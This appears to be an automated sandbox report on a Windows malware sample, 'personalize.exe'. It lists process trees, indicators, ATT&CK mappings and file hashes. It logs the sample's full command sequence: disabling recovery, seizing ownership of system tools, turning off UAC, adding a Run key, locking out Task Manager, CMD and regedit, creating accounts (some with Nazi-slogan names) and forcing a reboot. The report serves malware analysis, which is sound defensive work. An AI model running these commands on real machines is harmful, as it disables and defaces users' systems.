Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exe

pid	process
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

2528 MicrosoftEdgeCP.exe
2528 MicrosoftEdgeCP.exe
2528 MicrosoftEdgeCP.exe
2528 MicrosoftEdgeCP.exe
2528 MicrosoftEdgeCP.exe
2528 MicrosoftEdgeCP.exe
2528 MicrosoftEdgeCP.exe

pid	process
2528	MicrosoftEdgeCP.exe
2528	MicrosoftEdgeCP.exe
2528	MicrosoftEdgeCP.exe
2528	MicrosoftEdgeCP.exe
2528	MicrosoftEdgeCP.exe
2528	MicrosoftEdgeCP.exe
2528	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

taskmgr.exetakeown.exetakeown.exetakeown.exeMicrosoftEdgeCP.exeshutdown.exe

description	pid	process
Token: SeDebugPrivilege	4368	taskmgr.exe
Token: SeSystemProfilePrivilege	4368	taskmgr.exe
Token: SeCreateGlobalPrivilege	4368	taskmgr.exe
Token: SeTakeOwnershipPrivilege	1136	takeown.exe
Token: SeTakeOwnershipPrivilege	5008	takeown.exe
Token: SeTakeOwnershipPrivilege	4960	takeown.exe
Token: SeDebugPrivilege	4232	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4232	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4232	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4232	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	4920	shutdown.exe
Token: SeRemoteShutdownPrivilege	4920	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe
4368	taskmgr.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeLogonUI.exe

pid process

1620 MicrosoftEdge.exe
2528 MicrosoftEdgeCP.exe
4232 MicrosoftEdgeCP.exe
2528 MicrosoftEdgeCP.exe
1540 LogonUI.exe

pid	process
1620	MicrosoftEdge.exe
2528	MicrosoftEdgeCP.exe
4232	MicrosoftEdgeCP.exe
2528	MicrosoftEdgeCP.exe
1540	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

personalize.execmd.exenet.exenet.exe

description	pid	process	target process
PID 2752 wrote to memory of 2136	2752	personalize.exe	cmd.exe
PID 2752 wrote to memory of 2136	2752	personalize.exe	cmd.exe
PID 2136 wrote to memory of 4648	2136	cmd.exe	choice.exe
PID 2136 wrote to memory of 4648	2136	cmd.exe	choice.exe
PID 2136 wrote to memory of 428	2136	cmd.exe	choice.exe
PID 2136 wrote to memory of 428	2136	cmd.exe	choice.exe
PID 2136 wrote to memory of 304	2136	cmd.exe	bcdedit.exe
PID 2136 wrote to memory of 304	2136	cmd.exe	bcdedit.exe
PID 2136 wrote to memory of 2776	2136	cmd.exe	cmd.exe
PID 2136 wrote to memory of 2776	2136	cmd.exe	cmd.exe
PID 2136 wrote to memory of 3760	2136	cmd.exe	cmd.exe
PID 2136 wrote to memory of 3760	2136	cmd.exe	cmd.exe
PID 2136 wrote to memory of 356	2136	cmd.exe	attrib.exe
PID 2136 wrote to memory of 356	2136	cmd.exe	attrib.exe
PID 2136 wrote to memory of 1136	2136	cmd.exe	takeown.exe
PID 2136 wrote to memory of 1136	2136	cmd.exe	takeown.exe
PID 2136 wrote to memory of 652	2136	cmd.exe	icacls.exe
PID 2136 wrote to memory of 652	2136	cmd.exe	icacls.exe
PID 2136 wrote to memory of 5008	2136	cmd.exe	takeown.exe
PID 2136 wrote to memory of 5008	2136	cmd.exe	takeown.exe
PID 2136 wrote to memory of 4188	2136	cmd.exe	icacls.exe
PID 2136 wrote to memory of 4188	2136	cmd.exe	icacls.exe
PID 2136 wrote to memory of 4960	2136	cmd.exe	takeown.exe
PID 2136 wrote to memory of 4960	2136	cmd.exe	takeown.exe
PID 2136 wrote to memory of 2952	2136	cmd.exe	icacls.exe
PID 2136 wrote to memory of 2952	2136	cmd.exe	icacls.exe
PID 2136 wrote to memory of 1308	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 1308	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 3756	2136	cmd.exe	rundll32.exe
PID 2136 wrote to memory of 3756	2136	cmd.exe	rundll32.exe
PID 2136 wrote to memory of 168	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 168	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 424	2136	cmd.exe	attrib.exe
PID 2136 wrote to memory of 424	2136	cmd.exe	attrib.exe
PID 2136 wrote to memory of 3992	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 3992	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2912	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2912	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2924	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2924	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2684	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2684	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 1132	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 1132	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4428	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4428	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4448	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4448	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2864	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2864	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4228	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4228	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2256	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 2256	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4976	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 4976	2136	cmd.exe	reg.exe
PID 2136 wrote to memory of 5056	2136	cmd.exe	net.exe
PID 2136 wrote to memory of 5056	2136	cmd.exe	net.exe
PID 5056 wrote to memory of 2780	5056	net.exe	net1.exe
PID 5056 wrote to memory of 2780	5056	net.exe	net1.exe
PID 2136 wrote to memory of 2876	2136	cmd.exe	net.exe
PID 2136 wrote to memory of 2876	2136	cmd.exe	net.exe
PID 2876 wrote to memory of 4576	2876	net.exe	net1.exe
PID 2876 wrote to memory of 4576	2876	net.exe	net1.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

356 attrib.exe
424 attrib.exe

pid	process
356	attrib.exe
424	attrib.exe

C:\Users\Admin\AppData\Local\Temp\personalize.exe
"C:\Users\Admin\AppData\Local\Temp\personalize.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\594B.tmp\594C.tmp\594D.bat C:\Users\Admin\AppData\Local\Temp\personalize.exe"
2⤵
- Checks computer location settings
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\system32\choice.exe
choice /c yn /n /m ""
3⤵
PID:4648

C:\Windows\system32\choice.exe
choice /c yn /n /m ""
3⤵
PID:428

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
3⤵
- Modifies boot configuration data using bcdedit
PID:304

C:\Windows\system32\cmd.exe
cmd.exe
3⤵
PID:2776

C:\Windows\system32\cmd.exe
cmd.exe
3⤵
PID:3760

C:\Windows\system32\attrib.exe
attrib +s +h C:\Windows\System32\mbr.exe
3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:356

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\taskmgr.exe"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\system32\icacls.exe
icacls "C:\windows\system32\taskmgr.exe" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:652

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\mmc.exe"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5008

C:\Windows\system32\icacls.exe
icacls "C:\windows\system32\mmc.exe" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4188

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\msiexec.exe"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Windows\system32\icacls.exe
icacls "C:\windows\system32\msiexec.exe" /grant everyone:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2952

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f
3⤵
- Sets desktop wallpaper using registry
PID:1308

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
3⤵
PID:3756

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
PID:168

C:\Windows\system32\attrib.exe
attrib +s +h C:\Windows\System32\winnt64.exe
3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:424

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows NT Personalization tool" /T REG_SZ /F /D "C:\Windows\System32\winnt64.exe"
3⤵
- Adds Run key to start application
PID:3992

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:2912

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
3⤵
PID:2924

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
3⤵
PID:2684

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
3⤵
PID:1132

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
3⤵
PID:4428

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:4448

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoThemesTab /t REG_DWORD /d 1 /f
3⤵
PID:2864

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
3⤵
PID:4228

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /f
3⤵
PID:2256

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
3⤵
PID:4976

C:\Windows\system32\net.exe
net user /add NTCUS ntcus123
3⤵
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add NTCUS ntcus123
4⤵
PID:2780

C:\Windows\system32\net.exe
net user /add NTUSER ntcus124
3⤵
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add NTUSER ntcus124
4⤵
PID:4576

C:\Windows\system32\net.exe
net user /add NTDAT ntpersonalize
3⤵
PID:3892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add NTDAT ntpersonalize
4⤵
PID:808

C:\Windows\system32\net.exe
net user /add DC discord
3⤵
PID:1392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add DC discord
4⤵
PID:4424

C:\Windows\system32\net.exe
net user /add cfs belgium
3⤵
PID:984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add cfs belgium
4⤵
PID:2016

C:\Windows\system32\net.exe
net user /add leopoldII belgium
3⤵
PID:4912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add leopoldII belgium
4⤵
PID:2972

C:\Windows\system32\net.exe
net user /add SCHJIEAB rykn
3⤵
PID:4992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add SCHJIEAB rykn
4⤵
PID:1100

C:\Windows\system32\net.exe
net user /add IZWYOKWYIEN rykn
3⤵
PID:2552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add IZWYOKWYIEN rykn
4⤵
PID:3076

C:\Windows\system32\net.exe
net user /add asap asap
3⤵
PID:1464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add asap asap
4⤵
PID:4068

C:\Windows\system32\net.exe
net user /add REICHTANGLE ig1
3⤵
PID:3640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add REICHTANGLE ig1
4⤵
PID:3008

C:\Windows\system32\net.exe
net user /add SIEGHEIL hitler
3⤵
PID:1180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user /add SIEGHEIL hitler
4⤵
PID:4512

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f
3⤵
PID:2728

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f
3⤵
PID:3856

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
3⤵
- Disables RegEdit via registry modification
PID:1540

C:\Windows\system32\timeout.exe
timeout /t 15 /nobreak
3⤵
- Delays execution with timeout.exe
PID:436

C:\Windows\system32\timeout.exe
timeout /t 15 /nobreak
3⤵
- Delays execution with timeout.exe
PID:4352

C:\Windows\system32\timeout.exe
timeout /t 15 /nobreak
3⤵
- Delays execution with timeout.exe
PID:2856

C:\Windows\system32\shutdown.exe
shutdown /r /t 3 /c "id like to see you fix this lol"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4920

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4368

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1620

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2528

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4232

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2776

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2904

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3460

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3a42055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1540

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5236

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5276

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize
4KB

MD5
1bfe591a4fe3d91b03cdf26eaacd8f89

SHA1
719c37c320f518ac168c86723724891950911cea

SHA256
9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

SHA512
02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\V28C7N3J\edgecompatviewlist[1].xml
Filesize
74KB

MD5
d4fc49dc14f63895d997fa4940f24378

SHA1
3efb1437a7c5e46034147cbbc8db017c69d02c31

SHA256
853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

SHA512
cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\2IGNEILT\favicon[1].png
Filesize
7KB

MD5
9e3fe8db4c9f34d785a3064c7123a480

SHA1
0f77f9aa982c19665c642fa9b56b9b20c44983b6

SHA256
4d755ac02a070a1b4bb1b6f1c88ab493440109a8ac1e314aaced92f94cdc98e9

SHA512
20d8b416bd34f3d80a77305c6fcd597e9c2d92ab1db3f46ec5ac84f5cc6fb55dfcdccd03ffdc5d5de146d0add6d19064662ac3c83a852f3be8b8f650998828d1

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\DP7TYXVV\favicon[1].ico
Filesize
5KB

MD5
f3418a443e7d841097c714d69ec4bcb8

SHA1
49263695f6b0cdd72f45cf1b775e660fdc36c606

SHA256
6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

SHA512
82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\D6T1LJPV\googlelogo_color_68x28dp[1].png
Filesize
1KB

MD5
c4a931d597decd2553aac6634b766cf2

SHA1
6ec84fb4a2745b4b71520241be77db1fd1013830

SHA256
f56402b127698db4b4dc611a97a6f081d04c4691c60522c5912d189e37c94a9e

SHA512
4932e0f7f38085a7c52539bdd5c7f470740e560a4471bea30d12ef9e3efe77f6bbfac28d26c62a245c43d98ebf74c824b2b414843080a27edf1563a5f874ac84

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
Filesize
854B

MD5
8d1040b12a663ca4ec7277cfc1ce44f0

SHA1
b27fd6bbde79ebdaee158211a71493e21838756b

SHA256
3086094d4198a5bbd12938b0d2d5f696c4dfc77e1eae820added346a59aa8727

SHA512
610c72970856ef7a316152253f7025ac11635078f1aea7b84641715813792374d2447b1002f1967d62b24073ee291b3e4f3da777b71216a30488a5d7b6103ac1

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
ad7539b4b104e367e1c98cb63cf79d49

SHA1
02e181db0df0c6c06e09fa1f9332d335f4e33661

SHA256
6f8208f7a51de1b3736787dff5f3f4d40d454c3de60bf5ce0fe4b219b1b8e810

SHA512
782d12e61bc1e7cb9484e93a297822011cf868c151aac4ec403750027da2e1016e72e5d178a3ec8d8dd18b3de0e29a8b532c16576ca21dd1c889bd9a55a00328

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_DDBD94486534E9D7296CF30055005EDC
Filesize
472B

MD5
e04068fa748dbc0afc80a33888e8f22d

SHA1
2d600bd42a7554c7298404fd5fc603fdfcd9c1f0

SHA256
f4f38ca3be4aed87d361f2045ef747bbfb9d7b3f743664d4169ae229558f0e6a

SHA512
91fccd3d2e3e13d67e08556a3448b3d3fc5b731d012523797a00bc1c737e07aa22e00317bea3aaac6b9072a5fc6f16e6216834c2312ec0a6425f21eef1a54624

Download Submit
